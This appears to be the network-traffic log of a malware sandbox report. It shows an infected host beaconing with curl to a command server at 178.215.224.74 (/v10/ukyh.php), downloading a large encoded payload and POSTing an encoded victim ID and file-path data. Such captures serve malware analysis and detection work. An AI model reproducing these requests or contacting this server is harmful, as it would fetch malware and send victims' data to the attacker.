                                        Nov 21, 2024 20:01:57.484677076 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:58.848591089 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:58 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        55192.168.2.450057178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:59.477477074 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:00.862489939 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:00 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        56192.168.2.450058178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:01.096887112 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:02.421952963 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        57192.168.2.450059178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:03.138044119 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:04.439176083 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        58192.168.2.450060178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:04.717284918 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:06.170751095 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        59192.168.2.450061178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:06.967983007 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:08.285877943 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        60192.168.2.450062178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:09.247013092 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:10.553332090 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        61192.168.2.450063178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:10.718452930 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:12.026057005 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:11 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        62192.168.2.450064178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:11.975272894 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:13.378485918 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        63192.168.2.450065178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:12.307480097 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:13.580341101 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        64192.168.2.450066178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:13.606559038 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:14.955813885 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        65192.168.2.450067178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:13.812805891 CET118OUTGET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:15.175194025 CET1236INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 39 34 62 38 0d 0a 56 55 56 7a 52 6b 70 41 55 55 46 4a 51 30 4e 42 51 55 78 72 56 32 56 55 53 6d 52 61 65 47 4a 79 51 58 46 50 53 45 46 51 55 32 6c 45 5a 55 6c 4f 51 55 46 42 51 32 45 7a 52 6e 46 68 57 46 4a 75 54 58 45 31 61 57 42 48 65 6e 45 76 57 6a 73 36 56 6b 78 56 4d 30 46 4a 4e 6d 64 46 4d 55 39 54 58 45 68 4a 53 6b 30 32 52 30 42 44 61 57 4e 4a 52 57 45 34 55 44 4e 4a 65 6b 5a 35 4e 57 6c 76 61 7a 4a 2f 62 31 4a 44 51 57 4e 42 53 55 31 41 52 45 70 77 56 56 55 37 64 6c 42 45 64 55 56 68 52 57 77 32 54 30 64 57 65 31 68 74 63 44 4e 6d 50 6d 4e 57 56 6c 38 70 4d 33 78 69 4c 56 56 7a 4f 7a 46 77 59 6a 46 38 55 6d 64 30 55 55 70 53 64 32 6c 54 61 43 74 62 54 6c 64 52 63 55 4e 54 61 55 6c 6e 51 45 6b 31 4e 32 70 77 54 46 6c 54 62 32 39 54 51 32 31 67 5a 46 56 51 62 32 64 52 51 31 68 4d 64 44 45 78 4d 32 55 6a 4b 58 59 78 55 48 45 70 56 58 68 47 4e 7a 64 77 50 7a 73 77 4e 54 64 61 57 46 64 75 64 6e 52 30 57 33 35 56 4e 33 56 69 54 30 70 4e 59 30 67 34 51 7a 68 52 4e 47 70 70 4f 32 78 51 4e 6d 52 [TRUNCATED]
                                        Data Ascii: d94b8VUVzRkpAUUFJQ0NBQUxrV2VUSmRaeGJyQXFPSEFQU2lEZUlOQUFBQ2EzRnFhWFJuTXE1aWBHenEvWjs6VkxVM0FJNmdFMU9TXEhJSk02R0BDaWNJRWE4UDNJekZ5NWlvazJ/b1JDQWNBSU1AREpwVVU7dlBEdUVhRWw2T0dWe1htcDNmPmNWVl8pM3xiLVVzOzFwYjF8Umd0UUpSd2lTaCtbTldRcUNTaUlnQEk1N2pwTFlTb29TQ21gZFVQb2dRQ1hMdDExM2UjKXYxUHEpVXhGNzdwPzswNTdaWFdudnR0W35VN3ViT0pNY0g4QzhRNGppO2xQNmRpLXYtL3E6Ui82Yk06eGVWbXstcEx4ZHY3WGQvN2lSVFYzO3ZjL3JHVFYnNjdxYntYOU8tVS83OzcnOUNRdi8wVSlvYDVNKWxmKy81PmRtUGRJUycrNk9sbDVyent4W2lGQUxIc1lmamx0WFZ1RmVnYzM2YSszY3B0MW5FYWIxYS9HMUh2RWkwMTV2S2tgOUk9cGVjQU5WRlIyaGpAYUtNNHkzbllaTmViOz5tUC92UkxZWGg0am1NdGM5bjVlSzZkRjJkL3BKanIvRlZmT3l0fUBpamthdVRVd0ozbF9cd2BZSjcrbitoWk0+O2U3ai07VC9qdFdRdzlccnpDN3NlSC0pLTU1dlZlcXBJb24vMWxJSG1JVXpwLUVRWUg/YmtIKzc4c2x3cWgtS0phVWJgNzhMdHVjUkhjSzd3a2RDZm0xVkM0N25TcUEwND9KYjROWEl9aFpSZilnMU5vck06MTRLUnlkejEvdEVodnFkMmRDdHcxdnVJd39HNWF6SzppOnZ7M2RpO0hhN1N5dGNsRnpUI1YxNkxObFFuZyNdc0ZDLUVQN3VUMmZgelQxd0pWbnFFMVM4Zi8/eG91SDM1T2xBYE5vLTREc2ZyUS1aT3t2NztUMzZSNXNubmR+SWZWaDtER0V2dVh0YjtwNi9AN2QyM1
                                        Nov 21, 2024 20:02:15.175209999 CET1236INData Raw: 4e 42 4f 54 46 5a 5a 6d 31 68 56 46 6f 35 55 33 49 7a 4d 6b 34 31 4f 6e 4d 31 65 53 74 49 56 7a 78 55 4e 30 4a 68 55 31 42 2f 64 6a 5a 47 5a 45 77 30 4b 55 5a 78 49 31 42 6d 4f 31 55 79 53 45 4d 76 4f 57 70 45 64 6c 46 53 4e 45 68 45 4f 6b 70 79
                                        Data Ascii: NBOTFZZm1hVFo5U3IzMk41OnM1eStIVzxUN0JhU1B/djZGZEw0KUZxI1BmO1UySEMvOWpEdlFSNEhEOkpyQilIVzZQUHpuOkFOZHd3STA7RHZ1OzMyTGpMMUhjSnN4Pm12amstWm03dHhQRHV0O2o3WmlpdDpGLUhYeU47Zm9mdy9KcVUnUjdUWE1mT01kZkxOdWA4V1VYI1I3dD4xRmsvLSktLTctOHA4XHJWMjJSTXBDVXF4Z
                                        Nov 21, 2024 20:02:15.175228119 CET448INData Raw: 34 34 51 45 74 47 64 30 5a 67 4e 6a 4a 59 58 32 68 4d 4b 33 52 47 61 48 4a 32 52 30 70 6f 53 31 68 71 54 46 51 74 54 30 78 4d 4f 6b 39 6d 64 30 42 77 53 57 4a 77 54 31 55 35 4d 69 39 6b 55 57 78 30 59 56 45 7a 54 44 6c 46 62 45 74 37 4e 57 70 53
                                        Data Ascii: 44QEtGd0ZgNjJYX2hMK3RGaHJ2R0poS1hqTFQtT0xMOk9md0BwSWJwT1U5Mi9kUWx0YVEzTDlFbEt7NWpSWFFQNXZGbkVkTHBkY2k0VWpWRytnd21qZk5kTU11djRwN2xFeEhVcXgzYTVTV2RBdVRQN3Y6TkhjeEhccndDRndoeUdXLUNDdntIRVlDakRkS01yTXhVMjFlYTFaRVhWMExReXBXaU1sQWpIUUk6NW16MlFNQGw5d
                                        Nov 21, 2024 20:02:15.175251961 CET1236INData Raw: 52 48 63 7a 42 6c 56 31 68 41 53 54 4a 73 59 55 46 46 56 6b 70 71 54 58 52 30 61 32 4e 4e 5a 45 6b 33 62 58 52 36 5a 54 51 77 65 6a 46 51 4e 45 70 74 65 6d 39 59 61 6d 70 33 51 57 4e 6d 64 6c 46 70 4e 55 39 62 57 33 49 79 57 56 73 2f 4f 6e 52 7a
                                        Data Ascii: RHczBlV1hASTJsYUFFVkpqTXR0a2NNZEk3bXR6ZTQwejFQNEptem9Yamp3QWNmdlFpNU9bW3IyWVs/OnRzWFFrWkRGYi9panhFR296U2szV21VRTtXb2hTUHFzQ1ZTW3ZtO1Y0eHpKcXxPeXk+NVJ5YWVxUko7WElhaXh7T0dNOEtyR1ZMRz5gYUdtWEhTWkR6NWNnMjxUelJJdmNybTFIZ1BqW0laOU5sO0FafTBFPG5nM3tHb
                                        Nov 21, 2024 20:02:15.175263882 CET1236INData Raw: 35 79 61 33 70 49 54 46 41 77 52 55 4e 6b 65 46 70 52 4f 6a 51 30 55 6d 70 4d 62 44 52 4a 52 54 56 56 55 58 34 77 61 7a 5a 31 4d 45 4a 35 5a 55 31 6d 4e 57 64 66 57 46 46 6a 53 46 45 32 61 6d 35 50 4d 6b 45 78 55 6c 41 6a 64 45 42 57 4e 54 68 46
                                        Data Ascii: 5ya3pITFAwRUNkeFpROjQ0UmpMbDRJRTVVUX4wazZ1MEJ5ZU1mNWdfWFFjSFE2am5PMkExUlAjdEBWNThFWFp6c0x6SGE1Y3hbUnNlejlYZHt6NmxsN0ZlbFhGQXdNTHNkclFDTFc3QDZ5eVpuZUZmTTh2d0NLXHZPbDhDOktVTjt6SUpsY1hoNjhrNGxlZ1ojYk5udDIxbnRtUCcyRnRpS255MGVGYX5QcHRHey1wd0Q4TVUwT
                                        Nov 21, 2024 20:02:15.175275087 CET448INData Raw: 39 70 65 57 78 71 55 6d 34 78 65 47 56 46 51 30 52 4d 52 30 77 31 65 45 35 6e 52 48 6c 49 52 6a 35 44 5a 54 63 76 56 30 46 4a 52 58 4a 7a 4e 48 4a 72 54 56 63 33 4e 56 42 45 4e 30 35 73 54 30 56 6f 57 57 74 71 64 45 31 4c 55 6d 55 33 63 45 6c 61
                                        Data Ascii: 9peWxqUm4xeGVFQ0RMR0w1eE5nRHlIRj5DZTcvV0FJRXJzNHJrTVc3NVBEN05sT0VoWWtqdE1LUmU3cEladkRVQ25BRllkbls9NUZpRGFmVWFKUnJRQ2JLRkhVbWEyN2tOaXNWUWFzVFI6QnB5VGVSZXBMZ3JPSktSZUtmazFqTEVEMWdyS3dgWkhRMklKaG1PaEVHZ2haW3FQKTZ0d1UxeDszSzRUMWZFNm81WXNeVjRHTEhGV
                                        Nov 21, 2024 20:02:15.175412893 CET1236INData Raw: 5a 6b 53 6d 4e 4f 64 57 42 4b 4a 7a 5a 33 57 6c 5a 42 59 7a 56 6f 5a 32 46 47 65 45 5a 36 5a 33 46 5a 63 30 45 70 53 56 64 50 4f 6c 5a 78 55 32 6c 53 55 54 4a 6b 54 31 6c 6e 58 6b 42 57 62 6b 34 30 52 55 4e 73 63 6b 51 33 59 7a 67 74 57 48 67 31
                                        Data Ascii: ZkSmNOdWBKJzZ3WlZBYzVoZ2FGeEZ6Z3FZc0EpSVdPOlZxU2lSUTJkT1lnXkBWbk40RUNsckQ3YzgtWHg1YXhnK1BWcmJSTFhDKWgrc0V0dWZjS2hodnRjRkRZWHdpa2x1f3Y7Y2trZ2BsVVFEeG0rcnpVR2N6YkR5T0ZYTjJpTTlmWW4xanBDWkxRakUwRVI1Uzl4cCl1UFZgJzRxZEEpMVpMZVt7Vkd3dDdLWnVlamdRZGxJM
                                        Nov 21, 2024 20:02:15.175426006 CET1236INData Raw: 70 52 4d 47 73 32 4e 6a 4a 78 64 6c 4e 59 57 45 4e 4d 4d 56 68 48 5a 57 74 76 53 55 31 57 65 6a 56 55 5a 46 4e 4c 4d 54 5a 4a 54 6e 64 30 64 48 64 4c 62 54 74 45 4a 32 56 36 4f 6b 4a 6a 5a 58 70 49 57 7a 4e 71 56 33 64 4a 51 55 64 48 55 57 4e 32
                                        Data Ascii: pRMGs2NjJxdlNYWENMMVhHZWtvSU1WejVUZFNLMTZJTnd0dHdLbTtEJ2V6OkJjZXpIWzNqV3dJQUdHUWN2Z0d5ejRPSkRld2ZKc2syQXgzN25UUlY2Q3VpUHpwSWdzdlZBTU9RdzByMHszaWlITDA3LTZ4dkB1UlJhWnI4OnFVYTBbRTdVTHNoNDM2Y2p5UTQvTVNGYVJKcmFKUVhHbEk1d1dubGE5U3R7L25Jb2c1VFc3Y1N4c
                                        Nov 21, 2024 20:02:15.175578117 CET1236INData Raw: 4d 37 59 30 31 30 57 56 5a 68 55 6c 64 44 56 58 68 4a 52 54 42 79 64 6d 6c 33 59 57 52 4b 53 58 52 43 59 6d 6c 36 52 6d 39 4e 52 79 4e 7a 63 57 46 75 52 56 4e 33 4d 30 74 67 4f 56 52 66 52 32 46 47 53 43 6b 76 4e 48 56 52 54 43 39 7a 65 58 42 75
                                        Data Ascii: M7Y010WVZhUldDVXhJRTBydml3YWRKSXRCYml6Rm9NRyNzcWFuRVN3M0tgOVRfR2FGSCkvNHVRTC9zeXBuS3lAcEY4RXFIUkNtMDU2NG5OMC90KWpyTGo7ZUZ3bEl7UWpQVHJiVVJtVTNARVYweWRRazB2Z1dSV2xlQVJHbHRqbWlsVHtBVWJRZFxtREtPU1NWb0YzWDZVVEpQN2o8dEFaWnZ7X0NSdUR6TClwUmdYTE9YUEo0V
                                        Nov 21, 2024 20:02:15.175604105 CET1236INData Raw: 6c 56 66 31 4a 62 59 6a 64 33 61 58 56 77 4e 55 4e 7a 4f 6c 68 52 63 47 68 52 53 44 68 55 4d 58 59 76 4b 30 5a 68 65 46 59 77 65 6b 35 67 52 47 6c 55 56 47 6c 72 61 6c 46 75 4d 33 74 54 61 56 46 42 64 6b 63 30 54 6d 30 37 53 6b 4e 70 61 46 6b 78
                                        Data Ascii: lVf1JbYjd3aXVwNUNzOlhRcGhRSDhUMXYvK0ZheFYwek5gRGlUVGlralFuM3tTaVFBdkc0Tm07SkNpaFkxa0kwUTspSGV4QEAwM1VucltyWy1FYWorS2JJUlR7MGVFT3NadTVxaTNqNG5VYzE6LVZ0d0l7UkB0UGNudDVwNiN0UHFcQUBga0BjU2lIU3ZzYEdKbGNhUVFxZ0pWWjpNREZpR2dGU3pQbzlaUnlwSEcybmdVajVPc
                                        Nov 21, 2024 20:02:15.294857979 CET1236INData Raw: 6c 55 64 30 34 34 65 6a 46 51 4f 45 5a 6b 63 6d 56 6f 65 6a 46 5a 4d 55 64 6e 61 6e 74 7a 62 30 39 78 54 6b 4d 31 59 6c 56 4f 64 32 56 4d 49 33 68 30 5a 33 46 32 4d 31 52 45 59 31 46 33 5a 55 70 53 53 58 4a 47 5a 58 46 76 4e 32 31 47 4e 47 46 46
                                        Data Ascii: lUd044ejFQOEZkcmVoejFZMUdnantzb09xTkM1YlVOd2VMI3h0Z3F2M1REY1F3ZUpSSXJGZXFvN21GNGFFaDBlbEVvb0k3MDNETUxZTlh6SXBpMHQ2VmZxdVN5Q0xEcXt0SVhKV0xLezpxSm9hSW9YcFFTYTJyS2dKdE13cUo5U2hyNDlobUtvdylzWkI1TlRsezlNLVF6TUFrdlVGcERYMUxdN3hAdG5oS1ZGSWJaRmo0emdnV


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        66192.168.2.450068178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:15.932701111 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:17.215536118 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:16 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        67192.168.2.450069178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:18.105129004 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:19.431052923 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        68192.168.2.450070178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:18.161283016 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:19.483735085 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        69192.168.2.450071178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:19.657141924 CET629OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 335
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 68 6e 62 47 56 7a 58 45 4e 79 63 45 52 6a 64 47 46 63 55 47 39 70 62 57 74 73 5a 31 78 47 62 32 35 79 61 6d 6c 73 52 6e 64 74 63 48 4e 65 65 58 74 31 63 43 5a 34 61 33 68 62 51 6c 38 7a 4d 6a 49 6f 4d 54 49 35 4f 6a 45 6f 51 7a 68 63 56 58 4e 6c 63 6e 4e 65 59 6d 31 75 5a 58 4e 65 51 33 42 77 52 6d 46 30 59 56 35 53 5a 32 46 76 61 32 35 6e 58 6b 52 74 62 6e 4a 6f 61 32 78 47 64 57 31 77 63 56 52 7a 65 58 56 34 4c 48 68 68 63 46 6c 43 58 77 25 33 44 25 33 44
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGhnbGVzXENycERjdGFcUG9pbWtsZ1xGb25yamlsRndtcHNeeXt1cCZ4a3hbQl8zMjIoMTI5OjEoQzhcVXNlcnNeYm1uZXNeQ3BwRmF0YV5SZ2Fva25nXkRtbnJoa2xGdW1wcVRzeXV4LHhhcFlCXw%3D%3D
                                        Nov 21, 2024 20:02:20.989624977 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        70192.168.2.450072178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:20.657553911 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:22.030884981 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        71192.168.2.450073178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:21.233371019 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:22.497236967 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        72192.168.2.450074178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:22.237582922 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:23.593422890 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        73192.168.2.450075178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:22.696929932 CET97OUTGET /v10/ukyh.php?jspo=8 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
